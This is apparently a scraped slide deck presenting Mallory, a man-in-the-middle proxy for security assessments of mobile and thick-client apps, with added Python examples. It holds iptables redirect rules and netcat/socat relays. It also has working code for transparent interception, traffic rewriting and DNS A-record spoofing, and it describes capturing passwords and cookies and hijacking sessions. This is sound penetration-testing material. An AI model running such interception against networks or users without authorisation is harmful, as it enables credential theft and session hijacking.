
Who are we? - NCC Group · Who are we? Jeremy Allen Rajendra Umadas What do we do? Black box Mobile...

Date post: 31-Jul-2018

Who are we? Jeremy Allen, Rajendra Umadas

What do we do? Black box mobile app assessments, thick clients, web apps

Why Mallory exists: proxy setups for apps; throwaway tools that are all similar

“Scratching the Itch…” Introducing: Mallory

Architecture/Design

Open Source Tool

Demos

2

*Updated Slides: http://intrepidusgroup.com/insight/mallory

Other than carbon-based multi-cellular life forms

3

4

Principal Consultant at Intrepidus Group

Teaches Secure Coding

Writes Python Code

Breaks things

Youngin’ of the group

Bitten by security bug in college

Mobile Application Security == fun

Legacy Bugs

First (of many) Black Hats

5

6

A small demonstration of a task Mallory excels at

7

Mobile App Assessments: QUALCOMM/BREW, RIM, WinMo, iPhone, Android

Other devices and product assessments (closed devices)

Assess applications ON the device as delivered

Network focused attacks required

Web Application Assessments: $$ -- it pays the bills.

Blackboxy stuff: thick client apps/plugins that talk somehow

Binary protocols

8

Mobile Applications and Thick Clients

Often just a thick client using HTTP to transport data

Web Applications

May not be real HTTP (AMF, Other HTTP encapsulated binary protocols)

Example: Video on Demand with HTTP Pipelining – broke most proxies in some way

9

The above targets sometimes use proprietary transport protocols.

It may be hard to force a thick client or mobile app to tunnel data through HTTP proxy even if they use HTTP for transport

Web Apps may use ActiveX, Flash, or various other modules that add non-standard traffic

10

11

“Roll your own” clients

Many small scripts per engagement

Throwaway code per-engagement

Someone else wrote the proxy and we can’t change the code easily

12

It’s not using HTTP... what is it?

Binary protocols

Multiple streams stuffed into one SSL socket

Example: SSL protected phone applications, SSL VPNs

13

Gather data: figure out what we need

Server IP(s)

Server Port(s)

TCP or UDP?

Buffer sizes???

Any other anomalous characteristics

14

15

ARP Spoofing

DNS Control

Routing / NAT / Mangling

Protocol specific proxying

16

17

18

(nat table rules in iptables-save form; REDIRECT rewrites the destination to the local machine, so the proxy itself has to recover where the client was really going)

-A PREROUTING -i eth1 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 1231

-A PREROUTING -i eth1 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 1232

-A PREROUTING -i eth1 -p tcp -m tcp --dport 4356 -j REDIRECT --to-ports 1233

19

netcat (one direction only: the client's bytes reach host, but host's replies land on the second nc's stdout instead of going back to the client)

nc -l -p 1231 | nc host 80

nc -l -p 1232 | nc host 443

nc -l -p 1233 | nc host 4356

socat (full duplex; -v logs the text, -x adds a hex dump, fork serves one client per connection)

socat -v -x TCP-LISTEN:80,reuseaddr,fork TCP:host:80
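A transparent-aware proxy needs the destination the client really dialled, which REDIRECT has already rewritten; Mallory's dependency list points at netfilter conntrack for that, but the same answer is available per accepted connection from the Linux SO_ORIGINAL_DST socket option. The following is an added example written for this page, not Mallory's code: it decodes the struct sockaddr_in the kernel returns and shows a single listener fronting every redirected port. The interface name and REDIRECT target port 1234 in its comment are hypothetical.

```python
import socket
import struct

# Linux-only: getsockopt(SOL_IP, SO_ORIGINAL_DST) on a connection that
# arrived through an iptables REDIRECT/DNAT rule returns the address the
# client originally dialled as a 16-byte struct sockaddr_in.  Python's
# socket module does not export the constant, so it is defined here.
SOL_IP = 0
SO_ORIGINAL_DST = 80


def pack_sockaddr_in(ip, port):
    """Build a struct sockaddr_in the way the kernel hands it back:
    sin_family in host byte order, sin_port in network byte order,
    sin_addr as 4 raw bytes, then 8 bytes of sin_zero padding."""
    return (struct.pack("=H", socket.AF_INET) + struct.pack("!H", port)
            + socket.inet_aton(ip) + b"\x00" * 8)


def parse_sockaddr_in(raw):
    """Decode a 16-byte struct sockaddr_in into ("a.b.c.d", port)."""
    if len(raw) < 16:
        raise ValueError("sockaddr_in needs 16 bytes, got %d" % len(raw))
    (family,) = struct.unpack("=H", raw[:2])
    if family != socket.AF_INET:
        raise ValueError("not an AF_INET address (family=%d)" % family)
    (port,) = struct.unpack("!H", raw[2:4])
    return socket.inet_ntoa(raw[4:8]), port


def original_destination(conn):
    """(ip, port) the victim client was really connecting to, for a socket
    returned by accept() on the REDIRECT target port."""
    return parse_sockaddr_in(conn.getsockopt(SOL_IP, SO_ORIGINAL_DST, 16))


def serve_transparent(listen_port):
    """Accept redirected connections and print where each was headed.
    Pairs with one nat rule instead of one per port (hypothetical values):
      iptables -t nat -A PREROUTING -i eth1 -p tcp -j REDIRECT --to-ports 1234
    Needs root on the MiTM box.  A real proxy would dial the returned
    destination here and shovel bytes in both directions."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(("0.0.0.0", listen_port))
    ls.listen(64)
    while True:
        conn, client = ls.accept()
        server_ip, server_port = original_destination(conn)
        print("%s:%d -> %s:%d" % (client[0], client[1], server_ip, server_port))
        conn.close()


if __name__ == "__main__":
    serve_transparent(1234)
```

The decoder is kept separate from the getsockopt call so the byte layout can be checked without a redirected connection; sin_family is host-order while sin_port is network-order, which is the usual place this lookup goes wrong.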

20

21

Use scripting language to manipulate traffic in *cat setup (Python, Ruby, Perl, Whatever)

Tool is often very specific to application being assessed

Requires touchy sniffing, routing, NAT, IPTables and black magic to get it all flowing properly

Brittle

When they just want to make our lives difficult

Rube Goldberg

No one tool solves the problem very generically

Tools work well, just don’t meet some specific specifications (buffer size, platform intricacies, …)

Common problem that app assessors must solve in a slightly different manner per application and environment

Time to hack it together OR we solve it once generically for the majority of cases (We are lazy)

22

Existing Proxies: WebScarab, Burp, Paros, PFI, others.

Need to configure application and the proxy for full duplex communication

HTTP proxies don’t always work: NTP, FTP, SSH, SMTP, others

Limitations:

▪ Application might not support proxy setting

▪ Manual configuration of proxy endpoint

▪ May still require fancy IPTables, DNS and other control means

23

<redacted>

24

25

Transparent aware proxy for TCP and UDP

Decode Protocols

GUI Based “Debugger”

Rule system

▪ Edited in a file or in the GUI

▪ Modify traffic on the fly

▪ Determine what traffic is sent to the debugger

26

Acknowledgements

▪ Mike Zusman (EvProxy)

▪ Aaron Rhodes

▪ Rajendra Umadas (Shaboopi)

▪ Jeremy Allen (Mallory)

▪ Adam Pridgen

▪ Others!

Team provided testing, ideas and code!

27

Protocols

▪ Currently knows: HTTP, HTTPS, SSL, DNS and SSH

▪ Easy to implement new protocols

Plugins

▪ Per protocol

▪ HTTP and HTTPS well supported at this point

▪ Extensible platform for all MiTM needs on supported protocols

Proxification of Traffic

▪ Can turn off transparency awareness and force traffic to an external proxy

28

On a WiFi Access point

On a VPN Concentrator

On VM networks

On Net Books

29

30

Released right now

Available on bitbucket

▪ bitbucket.org/IntrepidusGroup/mallory

Mallory requires root privileges and an entire machine: we use it as a virtual machine mainly.

Mallory is also readily usable as a malicious access point (and many applications necessitate this approach)

31

Dependencies: Python 2.6, python2.6-dev, python-setuptools, python-pyasn1, python-netfilter, libnetfilter-conntrack-dev, pynetfilter_conntrack, netfilter-extensions-source, libnetfilter-conntrack3-dbg, libnetfilter-conntrack1_0.0.99-1_i386.deb, python-paramiko (http://software.inl.fr/trac/wiki/pynetfilter_conntrack)

32

Feature comparison. Columns: Transparent Aware | Extensible | Programmatic Instream Modification | Manual Instream Modification | Non-HTTP (X = supported, * = partial):

Mallory: X X X X X (all five)

Burp (HTTP proxies): X

PFI: X X X

Cain and Abel: X

Middler: X X

Ettercap: X X X

Netsed: X X

Squid: X * X

33

Mallory is a standard UDP and TCP server

Two threads per MiTM connection (one for the source and one for the destination)

Traffic Directions “C2S” = Client to Server “S2C” = Server to Client

Plugins are called in the middle of the shovel at the right spots per protocol

34

Use mercurial and bitbucket to get the tool

* hg clone https://bitbucket.org/IntrepidusGroup/mallory

After hg checkout

Read SETUP README

35

Options

No transparent

▪ Change listen port

▪ Specify the protocol to use

▪ Removes root and kernel dependencies

Specify the traffic database

Proxify (Send to some other destination)

36

-d / --trafficdb

Specify the traffic database name; default is "trafficdb". SQLite databases are used.

-p / --proto

Specify the protocol to use. This is only useful with the no-transparent option. You must specify the module inside of the protocol package as well as the exact protocol class to instantiate.

Example: -p sslproto.SSLProtocol or -p ssh.SSHProtocol or -p http.HTTP

37

TABLE: connections

connCount INTEGER: uniquely identifies a TCP stream in this database; used to JOIN on from the flows table

serverIp TEXT, serverPort INTEGER: original destination where the packet is going (pre-REDIRECT)

clientIp TEXT, clientPort INTEGER: victim client

TABLE: flows (actual data in connections; buffer sizes of the real connection are preserved)

conncount INTEGER: unique ID for this flow, maps to connections

direction TEXT: “c2s” / “s2c”

buffindex INTEGER: increasing number for this stream

timestamp FLOAT: seconds since epoch

buffer BLOB: the actual data received
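An added example of the shovel architecture described a few slides back (a standard TCP server, two threads per MiTM connection, c2s and s2c directions, plugins called between receive and send) writing into tables shaped like the connections/flows schema above. It is modelled on the slides, not taken from Mallory: the TrafficDB wrapper, the plugin calling convention, the upcase plugin and the demo's addresses and traffic are this example's own constructions, and the demo runs over local socket pairs so it needs no network or root.

```python
import socket
import sqlite3
import threading
import time

# Tables shaped like the connections/flows schema from the slides.
SCHEMA = """
CREATE TABLE IF NOT EXISTS connections (connCount INTEGER PRIMARY KEY AUTOINCREMENT,
    serverIp TEXT, serverPort INTEGER, clientIp TEXT, clientPort INTEGER);
CREATE TABLE IF NOT EXISTS flows (conncount INTEGER, direction TEXT,
    buffindex INTEGER, timestamp FLOAT, buffer BLOB);
"""


class TrafficDB:
    """Thread-safe wrapper around the SQLite traffic database."""
    def __init__(self, path=":memory:"):
        self.lock = threading.Lock()
        self.db = sqlite3.connect(path, check_same_thread=False)
        self.db.executescript(SCHEMA)

    def new_connection(self, client, server):
        """Record victim client and pre-REDIRECT server; return connCount."""
        with self.lock:
            cur = self.db.execute(
                "INSERT INTO connections (serverIp, serverPort, clientIp, clientPort) "
                "VALUES (?, ?, ?, ?)", (server[0], server[1], client[0], client[1]))
            self.db.commit()
            return cur.lastrowid

    def add_flow(self, conncount, direction, buffindex, data):
        with self.lock:
            self.db.execute("INSERT INTO flows VALUES (?, ?, ?, ?, ?)",
                            (conncount, direction, buffindex, time.time(), data))
            self.db.commit()

    def flows(self, conncount, direction):
        with self.lock:
            rows = self.db.execute(
                "SELECT buffer FROM flows WHERE conncount = ? AND direction = ? "
                "ORDER BY buffindex", (conncount, direction)).fetchall()
        return [bytes(r[0]) for r in rows]


def shovel(src, dst, direction, conncount, db, plugins=(), bufsize=4096):
    """One half of the MiTM: copy src -> dst until EOF.  Each recv() is
    forwarded and stored as its own buffer so real boundaries survive.
    Plugins get (direction, data) and return the bytes to forward."""
    index = 0
    while True:
        data = src.recv(bufsize)
        if not data:
            break
        for plugin in plugins:
            data = plugin(direction, data)
        if data:
            dst.sendall(data)
            db.add_flow(conncount, direction, index, data)
            index += 1
    try:
        dst.shutdown(socket.SHUT_WR)  # pass the half-close along
    except OSError:
        pass


def mitm(client_sock, server_sock, client_addr, server_addr, db, plugins=()):
    """Two threads per connection, one per direction; returns connCount."""
    cc = db.new_connection(client_addr, server_addr)
    threads = [threading.Thread(target=shovel, args=(client_sock, server_sock, "c2s", cc, db, plugins)),
               threading.Thread(target=shovel, args=(server_sock, client_sock, "s2c", cc, db, plugins))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return cc


def upcase_request(direction, data):
    """Toy plugin: rewrite client traffic only, pass server traffic untouched."""
    return data.upper() if direction == "c2s" else data


def demo():
    """Offline run: two AF_UNIX socket pairs stand in for the client<->Mallory
    and Mallory<->server TCP legs; the traffic is constructed, not captured."""
    client, proxy_c = socket.socketpair()
    proxy_s, server = socket.socketpair()
    db, result = TrafficDB(), {}

    def run():
        result["conncount"] = mitm(proxy_c, proxy_s, ("10.0.0.2", 51000),
                                   ("192.0.2.10", 4356), db, [upcase_request])
    t = threading.Thread(target=run)
    t.start()
    client.sendall(b"get /login http/1.0\r\n\r\n")
    client.shutdown(socket.SHUT_WR)                       # client done talking
    result["server_got"] = server.makefile("rb").read()   # read until half-close
    server.sendall(b"HTTP/1.0 200 OK\r\n\r\nok")
    server.shutdown(socket.SHUT_WR)
    result["client_got"] = client.makefile("rb").read()
    t.join()
    cc = result["conncount"]
    result["c2s"] = b"".join(db.flows(cc, "c2s"))
    result["s2c"] = b"".join(db.flows(cc, "s2c"))
    for s in (client, proxy_c, proxy_s, server):
        s.close()
    return result
```

Two details matter in practice: the half-close is propagated with shutdown(SHUT_WR) rather than close(), so a protocol that sends a final reply after the client stops talking still works, and the stored buffer is the modified one that actually went on the wire, so the database matches what the peer saw.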

38

TABLE: dgram (for UDP “connectionless” data)

saddr TEXT: source IP address in normal dotted quad format

sport INTEGER: source port

daddr TEXT: destination IP address in dotted quad

dport INTEGER: destination port

direction TEXT: “c2s” or “s2c”

body BLOB: the actual data contained in the packet

timestamp FLOAT: seconds since the epoch

39

“Debugging Clients” use XMLRPC to Talk to the Mallory server

Mallory has a GUI interface and a prototype style CLI interface

CLI is just to show how to interact with the GUI

40

Uses same XMLRPC mechanism to talk to server

41

Protocol decoding implementations

Plugins are how we want everyone to extend existing protocols

Plugins and Protocols are clean abstractions

We tried hard to make this neat and tidy

We already use this and write custom protocols and plugins for engagements

TODO: Documentation (coming to a bitbucket repository near you)

42

Get up and stretch!!!!

43

SSH MiTM

Overview of Python Paramiko

Things we will be doing soon: Port Forwarding

Logging of SSH data

44

I hacked your bank (HTTPS)

All your passwords and cookies are captured by mallory

Mobile apps like HTTP. HTTP is EVERYWHERE

Custom logging of HTTP data

45

Walk through a stream editing scenario

Walk through rule editing and explain the rule system in more detail if we need to

Show stream editing

46

Show how cool rules are: MuckPipe! show off the gzipstripper and then replace something.

Replaces NetSed – can be modified in the rule GUI

Autosend and rules make it easy to get to the data you need

Show command line version and in the GUI

Show GZIP / Deflate removal

Show VNC hax
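An added example of the two rules the demo above describes, a gzip/deflate stripper and a netsed-style replace, applied to complete HTTP messages. This is written for this page, not Mallory's code or its rule syntax: the function names and the constructed response are this example's own, and it assumes the whole non-chunked message is present in one buffer (reassembly across recv() boundaries is left to the caller).

```python
import gzip
import zlib


def split_message(msg):
    """Split a complete HTTP message into (start_line, [(name, value)], body)."""
    head, _, body = msg.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def join_message(start_line, headers, body):
    head = b"\r\n".join([start_line] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


def strip_accept_encoding(request):
    """C2S rule: drop Accept-Encoding so the server answers in plaintext and
    S2C rules can pattern-match the body without decompressing anything."""
    start, headers, body = split_message(request)
    headers = [(n, v) for n, v in headers if n.lower() != b"accept-encoding"]
    return join_message(start, headers, body)


def decode_body(headers, body):
    """Undo a gzip or deflate Content-Encoding; returns (plain_body, was_encoded)."""
    enc = dict((n.lower(), v.lower()) for n, v in headers).get(b"content-encoding", b"")
    if enc == b"gzip":
        return gzip.decompress(body), True
    if enc == b"deflate":
        try:
            return zlib.decompress(body), True                 # zlib-wrapped deflate
        except zlib.error:
            return zlib.decompress(body, -zlib.MAX_WBITS), True  # raw deflate
    return body, False


def rewrite_response(response, old, new):
    """S2C rule in the netsed style: decompress if needed, replace old with new
    in the body, drop Content-Encoding and fix Content-Length so the client
    still parses the message correctly after the edit."""
    start, headers, body = split_message(response)
    body, _ = decode_body(headers, body)
    body = body.replace(old, new)
    headers = [(n, v) for n, v in headers
               if n.lower() not in (b"content-encoding", b"content-length")]
    headers.append((b"Content-Length", str(len(body)).encode()))
    return join_message(start, headers, body)


def build_gzip_response(body):
    """Constructed sample server response (not captured traffic)."""
    gz = gzip.compress(body)
    return join_message(b"HTTP/1.1 200 OK",
                        [(b"Content-Type", b"text/html"),
                         (b"Content-Encoding", b"gzip"),
                         (b"Content-Length", str(len(gz)).encode())], gz)
```

Stripping Accept-Encoding on the way in is the cheap path; decoding on the way out is the fallback for servers that compress regardless. Either way the Content-Length must be recomputed after the replace, which is exactly the step a byte-oriented netsed cannot do.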

47

Quick code walkthrough of why HTTPS and the architecture is beautiful

Show how we generate certificates on the fly and why that is cool

Future: Zero byte size, on the fly, in memory certificates

48

HTTP -- Session Hijacking

Show off the sexy chrome hijacking plugin

Capture session data Visit Site Pwn

Useful for mobile apps we then want to load a real browser

And.. Of course.. It is session hijacking in two clicks

Explain SOP and why we used a plugin

Show some more code! Less than one hundred lines of code for the Mallory part

49

HTTP – Image Inversion

You may have already seen this ;-)

Very neat because it is a very simple plugin –Show case the ease of implementing this plugin. Make anyone feel like they can write a Mallory plugin

50

Most applications use DNS to find their target server

We can use our DNS A-Record lookup module to easily send it to an internal server

Future: Make this a plugin, as it should be. Integrate this into the GUI. Not done yet because it is something that gets changed once
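An added example of an A-record redirect module of the kind described above, written for this page rather than taken from Mallory: it parses the question, answers the names in its table with the chosen internal IP, and relays every other query to a real resolver so the victim's remaining lookups keep working. The record table, the default upstream resolver address and the function names are this example's assumptions.

```python
import socket
import struct

QTYPE_A, QCLASS_IN = 1, 1


def build_query(tid, name, qtype=QTYPE_A):
    """Constructed client query, as a stub resolver would send it."""
    qname = b"".join(struct.pack("B", len(l)) + l.encode("ascii") for l in name.split("."))
    return (struct.pack("!6H", tid, 0x0100, 1, 0, 0, 0)   # RD set, one question
            + qname + b"\x00" + struct.pack("!HH", qtype, QCLASS_IN))


def parse_question(packet):
    """Return (tid, flags, name, qtype, qclass, end_offset) for the first question."""
    tid, flags, qdcount = struct.unpack("!3H", packet[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    off, labels = 12, []
    while True:
        ln = packet[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:
            raise ValueError("compressed qname in a query")
        labels.append(packet[off:off + ln].decode("ascii"))
        off += ln
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return tid, flags, ".".join(labels).lower(), qtype, qclass, off + 4


def answer_query(packet, records, ttl=60):
    """If the query asks for an A record of a name in records, return a
    response pointing at our IP; otherwise None so the caller forwards it."""
    tid, flags, name, qtype, qclass, end = parse_question(packet)
    ip = records.get(name)
    if qtype != QTYPE_A or qclass != QCLASS_IN or ip is None:
        return None
    rflags = 0x8000 | (flags & 0x0100) | 0x0080           # QR, copy RD, RA
    header = struct.pack("!6H", tid, rflags, 1, 1, 0, 0)  # one question, one answer
    # Name is a pointer to offset 12, where the copied question starts.
    answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(ip)
    return header + packet[12:end] + answer


def serve(records, bind=("0.0.0.0", 53), upstream=("8.8.8.8", 53)):
    """UDP loop: answer our names, relay everything else upstream (hypothetical
    default resolver).  Needs root for port 53; victims reach it via DHCP/ARP."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(bind)
    while True:
        packet, client = sock.recvfrom(512)
        try:
            reply = answer_query(packet, records)
        except (ValueError, IndexError, struct.error):
            reply = None
        if reply is None:
            fwd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            fwd.settimeout(3)
            try:
                fwd.sendto(packet, upstream)
                reply = fwd.recv(512)
            except socket.timeout:
                continue
            finally:
                fwd.close()
        sock.sendto(reply, client)


if __name__ == "__main__":
    serve({"api.example.com": "10.0.0.1"})   # constructed record table
```

Only A/IN questions for listed names are answered; AAAA and everything else go upstream unchanged, which keeps the client's other traffic healthy and the redirect inconspicuous.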

51

Mallory: Generic TCP and UDP MiTM proxy

Extensible, versatile, open source.

Blog: http://intrepidusgroup.com/insight

Twitter: twitter.com/intrepidusgroup

Keep up on the project here: http://bitbucket.org/IntrepidusGroup/mallory

http://intrepidusgroup.com/insight/mallory

52

